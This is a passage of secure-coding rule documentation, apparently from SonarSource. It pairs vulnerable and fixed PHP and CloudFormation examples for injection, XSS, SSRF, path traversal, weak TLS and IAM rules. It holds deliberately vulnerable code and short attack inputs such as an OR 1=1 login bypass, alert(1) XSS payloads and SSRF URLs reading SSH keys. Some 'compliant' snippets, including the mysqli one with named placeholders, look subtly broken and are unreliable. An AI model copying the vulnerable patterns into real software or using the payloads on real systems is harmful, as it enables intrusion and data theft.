The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process that executes the code runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of code injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Core PHP

Code examples

The following code is vulnerable to arbitrary code execution because it builds and dynamically runs PHP code based on untrusted data.

Noncompliant code example

$operation = $_GET['operation'];
eval("product_${operation}();"); // Noncompliant

Compliant solution

$allowed = ["add", "remove", "update"];
$operation = $allowed[$_GET["operationId"]];
if ($operation !== "") {
    eval("product_${operation}();");
}

How does this work?

Allowing users to execute code dynamically generally creates more problems than it solves.

Anything that can be done via dynamic code execution can usually be done via a language’s native SDK and static code.
Therefore, our suggestion is to avoid executing code dynamically.
If the application requires the execution of dynamic code, additional security measures must be taken.

Dynamic parameters

When the untrusted values are only expected to be values used in standard processing, it is generally possible to provide them as parameters of the dynamic code. In that case, care should be taken to ensure that only the name of the untrusted parameter is passed to the dynamic code and not that its value is expanded into it. After that, the dynamic code will be able to safely access the untrusted parameter content and perform the processing.

Allow list

When the untrusted parameters are expected to contain operators, function names or other reflection-related values, best practices would encourage using an allow list. This one would contain a list of accepted safe values that can be used as part of the dynamic code.

When receiving an untrusted parameter, the application would verify its value is contained in the configured allow list. If it is present, the parameter is accepted. Otherwise, it is rejected and an error is raised.

Another similar approach is using a binding between identifiers and accepted values. That way, users are only allowed to provide identifiers, where only valid ones can be converted to a safe value.

The compliant code example uses such a binding approach.

Resources

Articles & blog posts

Standards

phpsecurity:S3649

Why is this an issue?

Database injections (such as SQL injections) occur in an application when the application retrieves data from a user or a third-party service and inserts it into a database query without sanitizing it first.

If an application contains a database query that is vulnerable to injections, it is exposed to attacks that target any database where that query is used.

A user with malicious intent carefully performs actions whose goal is to modify the existing query to change its logic to a malicious one.

After creating the malicious request, the attacker can attack the databases affected by this vulnerability without relying on any pre-requisites.

What is the potential impact?

In the context of a web application that is vulnerable to SQL injection:
After discovering the injection, attackers inject data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data manipulation

A malicious database query enables privilege escalation or direct data leakage from one or more databases. This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Chaining DB injections with other vulnerabilities

Attackers who exploit SQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in Core PHP

Code examples

The following code is an example of an overly simple authentication function. It is vulnerable to SQL injection because user-controlled data is inserted directly into a query string: The application assumes that incoming data always has a specific range of characters, and ignores that some characters may change the query logic to a malicious one.

In this particular case, the query can be exploited with the following string:

foo' OR 1=1 --

By adapting and inserting this template string into one of the fields (user or pass), an attacker would be able to log in as any user within the scoped user table.

Noncompliant code example

class AuthenticationHandler {

    public mysqli $conn;

    function authenticate() {
        $user = $_POST['user'];
        $pass = $_POST['pass'];
        $authenticated = false;

        $query = "SELECT * FROM users WHERE user = '" . $user . "' AND pass = '" . $pass . "'";

        $stmt = $this->conn->query($query); // Noncompliant

        if ($stmt->num_rows == 1) {
          $authenticated = true;
        }

        return $authenticated;
    }
}

Compliant solution

class AuthenticationHandler {

    public mysqli $conn;

    function authenticate() {
        $user = $_POST['user'];
        $pass = $_POST['pass'];
        $authenticated = false;

        $query = "SELECT * FROM users WHERE user = :user AND pass = :pass";

        $stmt = $this->conn->prepare($query);
        $stmt->bind_param(":user", $user);
        $stmt->bind_param(":pass", $pass);
        $stmt->execute();

        $stmt->store_result();

        if ( $stmt->num_rows == 1) {
          $authenticated = true;
        }

        return $authenticated;
    }
}

How does this work?

Use prepared statements

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of an interpreted context.

For database queries, prepared statements are a natural mechanism to achieve this due to their internal workings.
Here is an example with the following query string (Java SE syntax):

SELECT * FROM users WHERE user = ? AND pass = ?

Note: Placeholders may take different forms, depending on the library used. For the above example, the question mark symbol '?' was used as a placeholder.

When a prepared statement is used by an application, the database server compiles the query logic even before the application passes the literals corresponding to the placeholders to the database.
Some libraries expose a prepareStatement function that explicitly does so, and some do not - because they do it transparently.

The compiled code that contains the query logic also includes the placeholders: they serve as parameters.

After compilation, the query logic is frozen and cannot be changed.
So when the application passes the literals that replace the placeholders, they are not considered application logic by the database.

Consequently, the database server prevents the dynamic literals of a prepared statement from affecting the underlying query, and thus sanitizes them.

On the other hand, the application does not automatically sanitize third-party data (for example, user-controlled data) inserted directly into a query. An attacker who controls this third-party data can cause the database to execute malicious code.

Resources

Articles & blog posts

Standards

phpsecurity:S5131

This vulnerability makes it possible to temporarily execute JavaScript code in the context of the application, granting access to the session of the victim. This is possible because user-provided data, such as URL parameters, are copied into the HTML body of the HTTP response that is sent back to the user.

Why is this an issue?

Reflected cross-site scripting (XSS) occurs in a web application when the application retrieves data like parameters or headers from an incoming HTTP request and inserts it into its HTTP response without first sanitizing it. The most common cause is the insertion of GET parameters.

When well-intentioned users open a link to a page that is vulnerable to reflected XSS, they are exposed to attacks that target their own browser.

A user with malicious intent carefully crafts the link beforehand.

After creating this link, the attacker must use phishing techniques to ensure that his target users click on the link.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but it can also be arbitrary code that can be interpreted by the target user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Vandalism on the front-end website

The malicious link defaces the target web application from the perspective of the user who is the victim. This may result in loss of integrity and theft of the benevolent user’s data.

Identity spoofing

The forged link injects malicious code into the web application. The code enables identity spoofing thanks to cookie theft.

Record user activity

The forged link injects malicious code into the web application. To leak confidential information, attackers can inject code that records keyboard activity (keylogger) and even requests access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers chain cross-site scripting vulnerabilities with other vulnerabilities to maximize their impact.
For example, an XSS can be used as the first step to exploit more dangerous vulnerabilities or features that require higher privileges, such as a code injection vulnerability in the admin control panel of a web application.

How to fix it in Core PHP

Code examples

The following code is vulnerable to cross-site scripting because it returns an HTML response that contains user input.

User input embedded in HTML code should be HTML-encoded to prevent the injection of additional code. PHP provides the built-in function htmlspecialchars to do this.

Noncompliant code example

echo '<h1>' . $input . '</h1>';

Compliant solution

echo '<h1>' . htmlspecialchars($input) . '</h1>';

If you do not intend to send HTML code to clients, the vulnerability can be fixed by specifying the type of data returned in the response with the content-type header.

For example, setting the content-type to text/plain using the built-in header function allows to safely reflect user input since browsers will not try to parse and execute the response.

Noncompliant code example

echo $input;

Compliant solution

header('Content-Type: text/plain');
echo $input;

How does this work?

Encode data according to the HTML context

The best approach to protect against XSS is to systematically encode data that is written to HTML documents. The goal is to leave the data intact from the end user’s point of view but make it uninterpretable by web browsers.

XSS exploitation techniques vary depending on the HTML context where malicious input is injected. For each HTML context, there is a specific encoding to prevent JavaScript code from being interpreted. The following table summarizes the encoding to apply for each HTML context.

ContextCode exampleExploit exampleEncoding

Inbetween tags

<!doctype html>
<div>
  { data }
</div>
<!doctype html>
<div>
  <script>
    alert(1)
  </script>
</div>

HTML entity encoding: replace the following characters by HTML-safe sequences.

  • & → &amp;
  • < → &lt;
  • > → &gt;
  • " → &quot;
  • ' → &#x27;

In an attribute surrounded with single or double quotes

<!doctype html>
<div tag="{ data }">
  ...
</div>
<!doctype html>
<div tag=""
     onmouseover="alert(1)">
  ...
</div>

HTML entity encoding: replace the following characters with HTML-safe sequences.

  • & → &amp;
  • < → &lt;
  • > → &gt;
  • " → &quot;
  • ' → &#x27;

In an unquoted attribute

<!doctype html>
<div tag={ data }>
  ...
</div>
<!doctype html>
<div tag=foo
     onmouseover=alert(1)>
  ...
</div>

Dangerous context: HTML output encoding will not prevent XSS fully.

In a URL attribute

<!doctype html>
<a href="{ data }">
  ...
</a>
<!doctype html>
<a href="javascript:alert(1)">
  ...
</a>

Validate the URL by parsing the data. Make sure relative URLs start with a / and that absolute URLs use https as a scheme.

In a script block

<!doctype html>
<script>
  { data }
</script>
<!doctype html>
<script>
  alert(1)
</script>

Dangerous context: HTML output encoding will not prevent XSS fully. To pass values to a JavaScript context, the recommended way is to use a data attribute:

<!doctype html>
<script data="{ data }">
  ...
</script>

Pitfalls

Content-types

Be aware that there are more content-types than text/html that allow to execute JavaScript code in a browser and thus are prone to cross-site scripting vulnerabilities.
The following content-types are known to be affected:

  • application/mathml+xml
  • application/rdf+xml
  • application/vnd.wap.xhtml+xml
  • application/xhtml+xml
  • application/xml
  • image/svg+xml
  • multipart/x-mixed-replace
  • text/html
  • text/rdf
  • text/xml
  • text/xsl

Single quoted variables in attributes

By default, htmlspecialchars does not encode single quotes, so if $input is untrusted, JavaScript code can be injected.

Make sure to set the option ENT_QUOTES to encode single quotes.

Noncompliant code example
echo "<img src='" . htmlspecialchars($input) . "'>";
Compliant solution
echo "<img src='" . htmlspecialchars($input, ENT_QUOTES) . "'>";

Headers and output

If the HTTP body is sent before header is called, no headers will be sent to the client.

To fix this issue, send the headers before any output.

Noncompliant code example
echo 'No more headers at this point';
header('Content-Type: text/plain');
echo $input;
Compliant solution
header('Content-Type: text/plain');
echo $input;

Going the extra mile

Content Security Policy (CSP) Header

With a defense-in-depth security approach, the CSP response header can be added to instruct client browsers to block loading data that does not meet the application’s security requirements. If configured correctly, this can prevent any attempt to exploit XSS in the application.
Learn more here.

Resources

Documentation

Articles & blog posts

Conference presentations

Standards

phpsecurity:S5144

Why is this an issue?

Server-Side Request Forgery (SSRF) occurs when attackers can coerce a server to perform arbitrary requests on their behalf.

An SSRF vulnerability can either be basic or blind, depending on whether the server’s fetched data is directly returned in the web application’s response.
The absence of the corresponding response for the coerced request on the application is not a barrier to exploitation and thus must be treated in the same way as basic SSRF.

What is the potential impact?

SSRF usually results in unauthorized actions or data disclosure in the vulnerable application or on a different system it can reach. Conditional to what is reachable, remote command execution can be achieved, although it often requires chaining with further exploitations.

Information disclosure is SSRF’s core outcome. Depending on the extracted data, an attacker can perform a variety of different actions that can range from low to critical severity.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Local file read to host takeover

An attacker manipulates an application into performing a local request for a sensitive file, such as ~/.ssh/id_rsa, by using the File URI scheme file://.
Once in possession of the SSH keys, the attacker establishes a remote connection to the system hosting the web application.

Internal Network Reconnaissance

An attacker enumerates internal accessible ports from the affected server or others to which the server can communicate by iterating over the port field in the URL http://127.0.0.1:{port}.
Taking advantage of other supported URL schemas (dependent on the affected system), for example, gopher://127.0.0.1:3306, an attacker would be able to connect to a database service and perform queries on it.

How to fix it in Core PHP

Code examples

The following code is vulnerable to SSRF as it opens a URL defined by untrusted data.

Noncompliant code example

$host = $_GET['host'];
$url = "https://$host/.well-known/openid-configuration";

$ch = curl_init($url); // Noncompliant
curl_exec($ch);

Compliant solution

$allowedHosts = ["trusted1" => "trusted1.example.com", "trusted2" => "trusted2.example.com"];
$host = $allowedHosts[$_GET['host']];
$url = "https://$host/.well-known/openid-configuration";

$ch = curl_init($url);
curl_exec($ch);

How does this work?

The application should avoid opening URLs that are constructed with untrusted data.

When such a feature is strictly necessary, SSRF can be mitigated by applying an allow-list of trustable schemes and domains.

The compliant code example uses such an approach.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the SSRF vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.commit.malicious.io.

Resources

Standards

phpsecurity:S2083

Why is this an issue?

Path injections occur when an application uses untrusted data to construct a file path and access this file without validating its path first.

A user with malicious intent would inject specially crafted values, such as ../, to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access to.

What is the potential impact?

A web application is vulnerable to path injection and an attacker is able to exploit it.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override or delete arbitrary files

The injected path component tampers with the location of a file the application is supposed to delete or write into. The vulnerability is exploited to remove or corrupt files that are critical for the application or for the system to work properly.

It could result in data being lost or the application being unavailable.

Read arbitrary files

The injected path component tampers with the location of a file the application is supposed to read and output. The vulnerability is exploited to leak the content of arbitrary files from the file system, including sensitive files like SSH private keys.

How to fix it in Core PHP

Code examples

The following code is vulnerable to path injection as it creates a path using untrusted data without validation.

An attacker can exploit the vulnerability in this code to read arbitrary files.

Noncompliant code example

$fileName = $_GET["filename"];

file_get_contents($fileName); // Noncompliant

Compliant solution

$fileName = $_GET["filename"];
$targetDirectory = "/path/to/target/directory/";

$path = realpath($targetDirectory . $fileName);

if (str_starts_with($path,  $targetDirectory)) {
    file_get_contents($path);
}

How does this work?

Canonical path validation

If it is impossible to use secure-by-design APIs that do this automatically, the universal way to prevent path injection is to validate paths constructed from untrusted data:

  1. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.
  2. Resolve the canonical path of the file by using methods like `realPath`. This will resolve relative path or path components like ../ and removes any ambiguity regarding the file’s location.
  3. Check that the canonical path is within the directory where the file should be located.

Important Note: The order of this process pattern is important. The code must follow this order exactly to be secure by design:

  1. data = transform(user_input);
  2. data = normalize(data);
  3. data = sanitize(data);
  4. use(data);

As pointed out in this SonarSource talk, failure to follow this exact order leads to security vulnerabilities.

Resources

Standards

phpsecurity:S6287

Why is this an issue?

Session Cookie Injection occurs when a web application assigns session cookies to users using untrusted data.

Session cookies are used by web applications to identify users. Thus, controlling these enable control over the identity of the users within the application.

The injection might occur via a GET parameter, and the payload, for example, https://example.com?cookie=injectedcookie, delivered using phishing techniques.

What is the potential impact?

A well-intentioned user opens a malicious link that injects a session cookie in their web browser. This forces the user into unknowingly browsing a session that isn’t theirs.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Sensitive data disclosure

A victim introduces sensitive data within the attacker’s application session that can later be retrieved by them. This can lead to a variety of implications depending on what type of data is disclosed. Strictly confidential user data or organizational data leakage have different impacts.

Vulnerability chaining

An attacker not only manipulates a user into browsing an application using a session cookie of their control but also successfully detects and exploits a self-XSS on the target application.
The victim browses the vulnerable page using the attacker’s session and is affected by the XSS, which can then be used for a wide range of attacks including credential stealing using mirrored login pages.

How to fix it in Core PHP

Code examples

The following code is vulnerable to Session Cookie Injection as it assigns a session cookie using untrusted data.

Noncompliant code example

function checkCookie()
{
    if (!isset($_COOKIE['PHPSESSID'])) {
        $value = $_GET['cookie'];
        setcookie('PHPSESSID', $value); // Noncompliant
    }

    header('Location: /welcome.php');
}

Compliant solution

function checkCookie()
{
    if (!isset($_COOKIE['PHPSESSID'])) {
        header('Location: /getcookie.php');
    }

    header('Location: /welcome.php');
}

How does this work?

Untrusted data, such as GET or POST request content, should always be considered tainted. Therefore, an application should not blindly assign the value of a session cookie to untrusted data.

Session cookies should be generated using the built-in APIs of secure libraries that include session management instead of developing homemade tools.
Often, these existing solutions benefit from quality maintenance in terms of features, security, or hardening, and it is usually better to use these solutions than to develop your own.

Resources

Standards

phpsecurity:S6350

Constructing arguments of system commands from user input is security-sensitive. It has led in the past to the following vulnerabilities:

Arguments of system commands are processed by the executed program. The arguments are usually used to configure and influence the behavior of the programs. Control over a single argument might be enough for an attacker to trigger dangerous features like executing arbitrary commands or writing files into specific directories.

Ask Yourself Whether

  • Malicious arguments can result in undesired behavior in the executed command.
  • Passing user input to a system command is not necessary.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid constructing system commands from user input when possible.
  • Ensure that no risky arguments can be injected for the given program, e.g., type-cast the argument to an integer.
  • Use a more secure interface to communicate with other programs, e.g., the standard input stream (stdin).

Sensitive Code Example

Arguments like -delete or -exec for the find command can alter the expected behavior and result in vulnerabilities:

$input = $_GET['input'];
system('/usr/bin/find ' . escapeshellarg($input)); // Sensitive

Compliant Solution

Use an allow-list to restrict the arguments to trusted values:

$input = $_GET['input'];
if (in_array($input, $allowed, true)) {
  system('/usr/bin/find ' . escapeshellarg($input));
}

See

phpsecurity:S6173

Why is this an issue?

Reflection injections occur in a web application when it retrieves data from a user or a third-party service and fully or partially uses it to inspect, load or invoke a component by name.

If an application uses a reflection method in a way that is vulnerable to injections, it is exposed to attacks that aim to achieve remote code execution on the server’s website.

A user with malicious intent exploits this by carefully crafting a string involving symbols such as class methods, that will help them change the initial reflection logic to an impactful malicious one.

After creating the malicious request and triggering it, the attacker can attack the servers affected by this vulnerability without relying on any pre-requisites.

What is the potential impact?

If user-supplied values are used to choose which code is executed, an attacker may be able to supply carefully-chosen values that cause unexpected code to run. The attacker can use this ability to run arbitrary code on the server.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attackers succeed in injecting a seemingly-legitimate object, but whose properties might be used maliciously.

Depending on the application, attackers might be able to modify important data structures or content to escalate privileges or perform unwanted actions. For example, with an e-commerce application, this could be changing the number of products or prices.

Full application compromise

In the worst-case scenario, the attackers succeed in injecting an object triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker additionally manages to elevate their privileges as an administrator and attack other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised through a combination of unsafe deserialization and misconfiguration:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Core PHP

Code examples

In the following example, the code simulates a feature in an image editing application that allows users to install plugins to add new filters or effects. It assumes the user will give a known name, such as "SepiaEffect".

Noncompliant code example

function apply($effectName)
{
    try {
        $result = call_user_func($effectName, "applyFilter");
    } catch (\Throwable $e) {
        return "Filter Failure";
    }

    if ( $result == TRUE) {
        return "Filter Success";
    }
    else {
        return "Filter Failure";
    }
}

apply($_GET["filter"]);

Compliant solution

$EFFECT_ALLOW_LIST = [
    "SepiaEffect",
    "BlackAndWhiteEffect",
    "WaterColorEffect",
    "OilPaintingEffect"
];

function apply($effectName)
{
    global $EFFECT_ALLOW_LIST;
    if (!in_array($effectName, $EFFECT_ALLOW_LIST)) {
        return "Filter Failure";
    }

    try {
        $result = call_user_func($effectName, "applyFilter");
    } catch (\Throwable $e) {
        return "Filter Failure";
    }

    if ( $result == TRUE) {
        return "Filter Success";
    }
    else {
        return "Filter Failure";
    }
}

apply($_GET["filter"]);

How does this work?

Pre-Approved commands

The cleanest way to avoid this defect is to validate the input before using it in a reflection method.

Create a list of authorized and secure classes that you want the application to be able to execute.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must do validation on the server side. Not on client-side front-ends.

Resources

Articles & blog posts

Standards

phpsecurity:S2091

Why is this an issue?

XPath injections occur in an application when the application retrieves untrusted data and inserts it into an XML Path (XPath) query without sanitizing it first.

What is the potential impact?

In the context of a web application vulnerable to XPath injection:
After discovering the injection point, attackers insert data into the vulnerable field to execute malicious commands in the affected XML documents.

The impact of this vulnerability depends on the importance of XML structures in the enterprise.
In cases where organizations rely on XML structures for business-critical operations or where XML is used only for innocuous data transport, the severity of an attack ranges from critical to harmless.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data Leaks

A malicious XPath query allows direct data leakage from one or more databases. Although XML is not as widely used as it once was, this possibility still exists with configuration files, for example.

Data deletion and denial of service

The malicious query allows the attacker to delete data in the affected XML documents.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) and if XML structures are considered important, as missing critical data can disrupt the regular operations of an organization.

How to fix it in Core PHP

Code examples

The following noncompliant code is vulnerable to XPath injection because untrusted data is concatenated to an XPath query without prior validation.

Noncompliant code example

function authenticate(DOMXpath $xpath, string $username, string $password): bool {
    $expression = "/users/user[@name='" . $username . "' and @pass='" . $password . "']";
    $entries = $xpath->evaluate($expression);

    return $entries.length > 0
}

Compliant solution

function authenticate(DOMXpath $xpath, string $username, string $password): bool {
    if (!preg_match("/^[a-zA-Z0-9]*$/", $username) || !preg_match("/^[a-zA-Z0-9]*$/", $password)) {
        return false;
    }

    $expression = "/users/user[@name='" . $username . "' and @pass='" . $password . "']";
    $entries = $xpath->evaluate($expression);

    return $entries->length > 0
}

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

Validation

In case XPath parameterized queries are not available, the most secure way to protect against injections is to validate the input before using it in an XPath query.

Important: The application must do this validation server-side. Validating this client-side is insecure.

Input can be validated in multiple ways:

  • By checking against a list of authorized and secure strings that the application is allowed to use in a query.
  • By ensuring user input is restricted to a specific range of characters (e.g., the regex /^[a-zA-Z0-9]*$/ only allows alphanumeric characters.)
  • By ensuring user input does not include any XPath metacharacters, such as ", ', /, @, =, *, [, ], ( and ).

If user input is not considered valid, it should be rejected as it is unsafe.

In the compliant solution, a regex match ensures the username and password only contain alphanumeric characters before executing the XPath query.

Resources

Articles & blog posts

Standards

cloudformation:S6327

Amazon Simple Notification Service (SNS) is a managed messaging service for application-to-application (A2A) and application-to-person (A2P) communication. SNS topics allows publisher systems to fanout messages to a large number of subscriber systems. Amazon SNS allows to encrypt messages when they are received. In the case that adversaries gain physical access to the storage medium or otherwise leak a message they are not able to access the data.

Ask Yourself Whether

  • The topic contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SNS topics that contain sensitive information. Encryption and decryption are handled transparently by SNS, so no further modifications to the application are necessary.

Sensitive Code Example

For AWS::SNS::Topic:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Topic:  # Sensitive, encryption disabled by default
    Type: AWS::SNS::Topic
    Properties:
      DisplayName: "unencrypted_topic"

Compliant Solution

For AWS::SNS::Topic:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Topic:
    Type: AWS::SNS::Topic
    Properties:
      DisplayName: "encrypted_topic"
      KmsMasterKeyId:
        Fn::GetAtt:
          - TestKey
          - KeyId

See

cloudformation:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in API Gateway

Code examples

These code samples illustrate how to fix this issue in both APIGateway and ApiGatewayV2.

Noncompliant code example

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  CustomApi:
    Type: AWS::ApiGateway::DomainName
    Properties:
      SecurityPolicy: "TLS_1_0"  # Noncompliant

The ApiGatewayV2 uses a weak TLS version by default:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  CustomApi: # Noncompliant
    Type: AWS::ApiGatewayV2::DomainName

Compliant solution

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  CustomApi:
    Type: AWS::ApiGateway::DomainName
    Properties:
      SecurityPolicy: "TLS_1_2"
AWSTemplateFormatVersion: '2010-09-09'
Resources:
  CustomApi:
    Type: AWS::ApiGatewayV2::DomainName
    Properties:
      DomainNameConfigurations:
        - SecurityPolicy: "TLS_1_2"

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older and insecure cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

cloudformation:S6304

A policy that allows identities to access all resources in an AWS account may violate the principle of least privilege. Suppose an identity has permission to access all resources even though it only requires access to some non-sensitive ones. In this case, unauthorized access and disclosure of sensitive information will occur.

Ask Yourself Whether

The AWS account has more than one resource with different levels of sensitivity.

A risk exists if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e., by only granting access to necessary resources. A good practice to achieve this is to organize or tag resources depending on the sensitivity level of data they store or process. Therefore, managing a secure access control is less prone to errors.

Sensitive Code Example

Update permission is granted for all policies using the wildcard (*) in the Resource property:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExamplePolicy:
    Type: AWS::IAM::ManagedPolicy
    Properties:
        PolicyDocument:
            Version: "2012-10-17"
            Statement:
                - Effect: Allow
                  Action:
                    - "iam:CreatePolicyVersion"
                  Resource:
                    - "*" # Sensitive
        Roles:
            - !Ref MyRole

Compliant Solution

Restrict update permission to the appropriate subset of policies:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExamplePolicy:
    Type: AWS::IAM::ManagedPolicy
    Properties:
        PolicyDocument:
            Version: "2012-10-17"
            Statement:
                - Effect: Allow
                  Action:
                    - "iam:CreatePolicyVersion"
                  Resource:
                    - !Sub "arn:aws:iam::${AWS::AccountId}:policy/team1/*"
        Roles:
            - !Ref MyRole

Exceptions

  • Should not be raised on key policies (when AWS KMS actions are used.)
  • Should not be raised on policies not using any resources (if and only if all actions in the policy never require resources.)

See

cloudformation:S6249

By default, S3 buckets can be accessed through HTTP and HTTPs protocols.

As HTTP is a clear-text protocol, it lacks the encryption of transported data, as well as the capability to build an authenticated connection. It means that a malicious actor who is able to intercept traffic from the network can read, modify or corrupt the transported content.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure has to comply with AWS Foundational Security Best Practices standard.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to deny all HTTP requests:

  • for all objects (*) of the bucket
  • for all principals (*)
  • for all actions (*)

Sensitive Code Example

No secure policy is attached to this S3 bucket:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Sensitive

A policy is defined but forces only HTTPs communication for some users:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Sensitive
    Properties:
      BucketName: "mynoncompliantbucket"

  S3BucketPolicy:
    Type: 'AWS::S3::BucketPolicy'
    Properties:
      Bucket: !Ref S3Bucket
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Deny
            Principal:
              AWS: # Sensitive: only one principal is forced to use https
                - 'arn:aws:iam::123456789123:root'
            Action: "*"
            Resource: arn:aws:s3:::mynoncompliantbuckets6249/*
            Condition:
              Bool:
                "aws:SecureTransport": false

Compliant Solution

A secure policy that denies the use of all HTTP requests:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Compliant
    Properties:
      BucketName: "mycompliantbucket"

  S3BucketPolicy:
